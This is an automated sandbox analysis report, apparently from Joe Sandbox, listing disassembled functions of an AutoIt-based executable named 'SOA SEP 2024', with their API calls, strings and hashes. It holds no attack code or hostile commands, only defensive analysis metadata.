Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ea10abf92143be6d5f7a7aea8e0d1fa499ced5894f38c6cbeb54a8ded03acf7c
Instruction ID: 45b8e09f854703ddc8bef6b640a1c84fabe4369f4db3a5862cdaf704f8b51a29
Opcode Fuzzy Hash: ea10abf92143be6d5f7a7aea8e0d1fa499ced5894f38c6cbeb54a8ded03acf7c
Instruction Fuzzy Hash: C551B231348302EB8720DF10C8858A9B7A5FFDA710B144A1AF467EBB95DB6CDE85D742

Function 0076CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0076CC68
__wcsnicmp.LIBCMT ref: 0076CC80
__wcsnicmp.LIBCMT ref: 0076CC98
__wcsnicmp.LIBCMT ref: 0076CCB0
__wcsnicmp.LIBCMT ref: 0076CCC8
__wcsnicmp.LIBCMT ref: 0076CCE0
__wcsnicmp.LIBCMT ref: 0076CCF8
__wcsnicmp.LIBCMT ref: 0076CD0C
__wcsnicmp.LIBCMT ref: 0076CD4D
__wcsnicmp.LIBCMT ref: 0076CD61
__wcsnicmp.LIBCMT ref: 0076CD75
__wcsnicmp.LIBCMT ref: 0076CD89

Strings

Cannot parse #include, xrefs: 007D2FA1
#comments-start, xrefs: 0076CCF2, 0076CD47
#OnAutoItStartRegister, xrefs: 0076CCAA
#ce, xrefs: 0076CD83
#pragma compile, xrefs: 0076CC62
Unterminated group of comments, xrefs: 007D2FB4
#cs, xrefs: 0076CD06, 0076CD5B
Bad directive syntax error, xrefs: 007D2ECB
#include-once, xrefs: 0076CCC2
#comments-end, xrefs: 0076CD6F
#notrayicon, xrefs: 0076CC7A
#requireadmin, xrefs: 0076CC92
#include, xrefs: 0076CCDA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 38a5451aaeb0d3c8bb03a87bab6c0b74d77fa12e37d97cadbc35c22f1cd631d0
Instruction ID: 636d968fee5b6e253c5dbda5f741857ff1302c90e51c1a788f99c94c982d2c94
Opcode Fuzzy Hash: 38a5451aaeb0d3c8bb03a87bab6c0b74d77fa12e37d97cadbc35c22f1cd631d0
Instruction Fuzzy Hash: 8581D871740209EACB22AF64DC47FBE3779AF24740F044025FD46AA283EB6DD946C6A1

Function 007CC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 007CC788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007CC83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 007CC859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 007CCB15

Strings

0, xrefs: 007CC89C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: fb31e90ca8270a32cfb08862abc340606db0acdbb69b156d6d04adf538637244
Instruction ID: e7c649c7dd0f375915d8c1e2476af64915e0f45fffb792c751e1ee99c70f3fdc
Opcode Fuzzy Hash: fb31e90ca8270a32cfb08862abc340606db0acdbb69b156d6d04adf538637244
Instruction Fuzzy Hash: 45F1BB71205341AFE7228F24C889FAABBE4FF49354F08462DF58C962A1C778DC41CBA1

Function 007C638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,007FDC00), ref: 007C6449

Strings

GETCURRENTCOL, xrefs: 007C6724
GETCURRENTLINE, xrefs: 007C6704
TABLEFT, xrefs: 007C64A7
CHECK, xrefs: 007C668B
GETSELECTED, xrefs: 007C66C1
DELSTRING, xrefs: 007C6569
SETCURRENTSELECTION, xrefs: 007C65D6
SENDCOMMANDID, xrefs: 007C67CA
TABRIGHT, xrefs: 007C64BD
HIDEDROPDOWN, xrefs: 007C6520
ISENABLED, xrefs: 007C648C
FINDSTRING, xrefs: 007C6596
GETLINE, xrefs: 007C678B
GETCURRENTSELECTION, xrefs: 007C6603
UNCHECK, xrefs: 007C66A1
ADDSTRING, xrefs: 007C6536
SHOWDROPDOWN, xrefs: 007C6500
EDITPASTE, xrefs: 007C675B
ISVISIBLE, xrefs: 007C6455
CURRENTTAB, xrefs: 007C64DD
GETLINECOUNT, xrefs: 007C66E4
ISCHECKED, xrefs: 007C6659
SELECTSTRING, xrefs: 007C6626

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: bac0f33014b9a31a8e591887fd1ebefe3aff6ef35f7b843ab652ad65b0c293bd
Instruction ID: b426d2e088b6a57a8fd4ffed1ce7139cb508c23ecf9974b9a1f99453b080aec9
Opcode Fuzzy Hash: bac0f33014b9a31a8e591887fd1ebefe3aff6ef35f7b843ab652ad65b0c293bd
Instruction Fuzzy Hash: 6AC17334204245CBCF05EF50D595EAE77E9BF94344F14886CF88A9B392DB28ED4ACB52

Function 007CD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007CD5AE
SetTextColor.GDI32(?,?), ref: 007CD5B2
GetSysColorBrush.USER32(0000000F), ref: 007CD5C8
GetSysColor.USER32(0000000F), ref: 007CD5D3
CreateSolidBrush.GDI32(?), ref: 007CD5D8
GetSysColor.USER32(00000011), ref: 007CD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD5FE
SelectObject.GDI32(?,00000000), ref: 007CD60F
SetBkColor.GDI32(?,00000000), ref: 007CD618
SelectObject.GDI32(?,?), ref: 007CD625
InflateRect.USER32(?,000000FF,000000FF), ref: 007CD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 007CD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 007CD6DD
DrawFocusRect.USER32(?,?), ref: 007CD6E8
GetSysColor.USER32(00000011), ref: 007CD6F6
SetTextColor.GDI32(?,00000000), ref: 007CD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CD712
SelectObject.GDI32(?,007CD2A5), ref: 007CD729
DeleteObject.GDI32(?), ref: 007CD734
SelectObject.GDI32(?,?), ref: 007CD73A
DeleteObject.GDI32(?), ref: 007CD73F
SetTextColor.GDI32(?,?), ref: 007CD745
SetBkColor.GDI32(?,?), ref: 007CD74F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 851348c8b8964ce02aa83e312f04d5c14292cb6f01dfcce8008581b9a67eedf7
Instruction ID: b00ea8c649257137ecd3efa4837993cd36619431c23fdef292b194ad1d17ea89
Opcode Fuzzy Hash: 851348c8b8964ce02aa83e312f04d5c14292cb6f01dfcce8008581b9a67eedf7
Instruction Fuzzy Hash: 0D514C71901248BFDF209FA4DC88EAE7B79FB08324F118119F915AB2A1D7799E40CF54

Function 007CB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007CB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB7C1
CharNextW.USER32(0000014E), ref: 007CB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007CB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007CB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007CB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007CB875
SetWindowTextW.USER32(?,0000014E), ref: 007CB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007CB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 007CB90E
_memset.LIBCMT ref: 007CB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007CB97C
_memset.LIBCMT ref: 007CB9DB
SendMessageW.USER32 ref: 007CBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 007CBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 007CBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 007CBB2C
GetMenuItemInfoW.USER32(?), ref: 007CBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007CBBA3
DrawMenuBar.USER32(?), ref: 007CBBB2
SetWindowTextW.USER32(?,0000014E), ref: 007CBBDA

Strings

0, xrefs: 007CBB4F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 04878612cd01bdfa762d8e194e409732e0f1d820b9e40ecdb3cae5d03f917b7d
Instruction ID: e9986a8549139caf0dbfeecd1142523a2ef24c107dd0c06805b0141057b20fb7
Opcode Fuzzy Hash: 04878612cd01bdfa762d8e194e409732e0f1d820b9e40ecdb3cae5d03f917b7d
Instruction Fuzzy Hash: FEE15DB5900218EBDF209FA1CC8AFEE7BB8EF05754F14815EF919AA190D77899418F60

Function 007C764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007C778A
GetDesktopWindow.USER32 ref: 007C779F
GetWindowRect.USER32(00000000), ref: 007C77A6
GetWindowLongW.USER32(?,000000F0), ref: 007C7808
DestroyWindow.USER32(?), ref: 007C7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C78A1
SendMessageW.USER32(?,00000421,?,?), ref: 007C78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C78C9
IsWindowVisible.USER32(?), ref: 007C78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C7918
GetWindowRect.USER32(?,?), ref: 007C7930
MonitorFromPoint.USER32(?,?,00000002), ref: 007C7956
GetMonitorInfoW.USER32 ref: 007C7970
CopyRect.USER32(?,?), ref: 007C7987
SendMessageW.USER32(?,00000412,00000000), ref: 007C79F2

Strings

0, xrefs: 007C7735
tooltips_class32, xrefs: 007C7856
(, xrefs: 007C7965

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a7201db6a80b5e1084c87d0dfc38ecfcbdefb0855e63cd5aeae7fcbf66ace087
Instruction ID: ded008fbac892d3b22db79b69c38a6c9c12f4438b1718895427aafa4272dea8d
Opcode Fuzzy Hash: a7201db6a80b5e1084c87d0dfc38ecfcbdefb0855e63cd5aeae7fcbf66ace087
Instruction Fuzzy Hash: 1FB16C71608340AFDB14DF64C989B5ABBE5BF88350F00891DF9999B291DB78EC04CF95

Function 007A6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 007A6CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007A6D21
_wcscpy.LIBCMT ref: 007A6D4F
_wcscmp.LIBCMT ref: 007A6D5A
_wcscat.LIBCMT ref: 007A6D70
_wcsstr.LIBCMT ref: 007A6D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007A6D97
_wcscat.LIBCMT ref: 007A6DE0
_wcscat.LIBCMT ref: 007A6DE7
_wcsncpy.LIBCMT ref: 007A6E12

Strings

%u.%u.%u.%u, xrefs: 007A6E75
04090000, xrefs: 007A6DCD
DefaultLangCodepage, xrefs: 007A6DFA
StringFileInfo\, xrefs: 007A6D6A
\VarFileInfo\Translation, xrefs: 007A6D8F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 8eaf87fa8b8cdc1846bcd62cb3499f12be0d0dcdf52ff5667aab99dc1c96abe6
Instruction ID: cdea263939f602ddda490175d6ec28d7199fc7bd603e0e959e48ce217dbfb3c6
Opcode Fuzzy Hash: 8eaf87fa8b8cdc1846bcd62cb3499f12be0d0dcdf52ff5667aab99dc1c96abe6
Instruction Fuzzy Hash: 6F41D372640204FFEB10BB64CD4BEBF777CEF45750F044129F905A6182EA7C9A0597A6

Function 0077A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A939
GetSystemMetrics.USER32(00000007), ref: 0077A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A96C
GetSystemMetrics.USER32(00000008), ref: 0077A974
GetSystemMetrics.USER32(00000004), ref: 0077A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0077A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0077A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0077AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0077AA2B
GetStockObject.GDI32(00000011), ref: 0077AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0077AA52

Part of subcall function 0077B63C: GetCursorPos.USER32(000000FF), ref: 0077B64F
Part of subcall function 0077B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0077B66C
Part of subcall function 0077B63C: GetAsyncKeyState.USER32(00000001), ref: 0077B691
Part of subcall function 0077B63C: GetAsyncKeyState.USER32(00000002), ref: 0077B69F

SetTimer.USER32(00000000,00000000,00000028,0077AB87), ref: 0077AA79

Strings

AutoIt v3 GUI, xrefs: 0077A9F1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 9d7669d5c3bd97e3b1c0c155a9ebc79de52a0043a96a1bec297630f114b35bb0
Instruction ID: e7e6839026d12bc54d111fc313b11e3a5c48a836603773e4bef738ab2231b7a9
Opcode Fuzzy Hash: 9d7669d5c3bd97e3b1c0c155a9ebc79de52a0043a96a1bec297630f114b35bb0
Instruction Fuzzy Hash: EAB1917160020AEFDF24DFA8CC89BAD7BB4FB58350F118129FA09AB290D7789C51CB55

Function 00762EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00762F7A
IsWindow.USER32(?), ref: 007D22FD

Strings

TITLE, xrefs: 007D2292
LAST, xrefs: 007D20B6
ACTIVE, xrefs: 007D20CC
CLASS, xrefs: 007D2128
HANDLE, xrefs: 007D20E2
INSTANCE, xrefs: 007D223C
REGEXPCLASS, xrefs: 007D2149
ALL, xrefs: 007D2264
REGEXPTITLE, xrefs: 007D20F8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 3447aa3d012eaf8404744c0574044b9bbb229bd41834cb428f1f275ae74a98db
Instruction ID: 3bfc6866827b155943dddba1ed1d74ad849d1ac7f80c6784863cba0b8d702632
Opcode Fuzzy Hash: 3447aa3d012eaf8404744c0574044b9bbb229bd41834cb428f1f275ae74a98db
Instruction Fuzzy Hash: ECD1EB30108646DBCB14EF50C8859EABBB4FF64340F00495AF45A97663DB38F99BCB91

Function 007C3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,007FDC00,00000000,?,00000000,?,?), ref: 007C37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C3874
RegCloseKey.ADVAPI32(?), ref: 007C3B94
RegCloseKey.ADVAPI32(00000000), ref: 007C3BA1

Strings

REG_QWORD, xrefs: 007C3AE2
REG_MULTI_SZ, xrefs: 007C395C
REG_DWORD, xrefs: 007C3A65
REG_SZ, xrefs: 007C38B2
REG_BINARY, xrefs: 007C3B2F
REG_EXPAND_SZ, xrefs: 007C3811

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 59249a5e3837ac16a5f0ff87a18bf37fce1d48c5375325a4693346ac4f597bc2
Instruction ID: 0a278589add399c0b26c024313fd67af5b979780ae212bfef059c193f22ce105
Opcode Fuzzy Hash: 59249a5e3837ac16a5f0ff87a18bf37fce1d48c5375325a4693346ac4f597bc2
Instruction Fuzzy Hash: 60021475604601DFCB15EF15C899E2AB7E9EF88720B05845DF99A9B2A1CB38ED01CB81

Function 007C6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007C6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C6D16

Strings

GETSUBITEMCOUNT, xrefs: 007C6CA1
GETSELECTEDCOUNT, xrefs: 007C6CF9
GETITEMCOUNT, xrefs: 007C6C84
GETSELECTED, xrefs: 007C6E3C
FINDITEM, xrefs: 007C6E81
SELECTINVERT, xrefs: 007C6DDE
VIEWCHANGE, xrefs: 007C6ECD
SELECT, xrefs: 007C6DA8
DESELECT, xrefs: 007C6DFC
SELECTCLEAR, xrefs: 007C6D8D
GETTEXT, xrefs: 007C6CBF
ISSELECTED, xrefs: 007C6D21
SELECTALL, xrefs: 007C6D75

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 7709cb639ac72048ff6b177136eb728994c1f8b191bd6417bf03e2b4ff7da4b6
Instruction ID: f241271da46b42df4a385300c531b2ae7e11da96c50d76cd16eac79923de3101
Opcode Fuzzy Hash: 7709cb639ac72048ff6b177136eb728994c1f8b191bd6417bf03e2b4ff7da4b6
Instruction Fuzzy Hash: 98A16D74214241DFCB14EF20C995F6AB3A9FF84350F14896DB95A9B392DB38EC0ACB51

Function 0079CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0079CF91
__swprintf.LIBCMT ref: 0079D032
_wcscmp.LIBCMT ref: 0079D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079D09A
_wcscmp.LIBCMT ref: 0079D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0079D10D
GetDlgCtrlID.USER32(?), ref: 0079D15F
GetWindowRect.USER32(?,?), ref: 0079D195
GetParent.USER32(?), ref: 0079D1B3
ScreenToClient.USER32(00000000), ref: 0079D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0079D234
_wcscmp.LIBCMT ref: 0079D248
GetWindowTextW.USER32(?,?,00000400), ref: 0079D26E
_wcscmp.LIBCMT ref: 0079D282

Strings

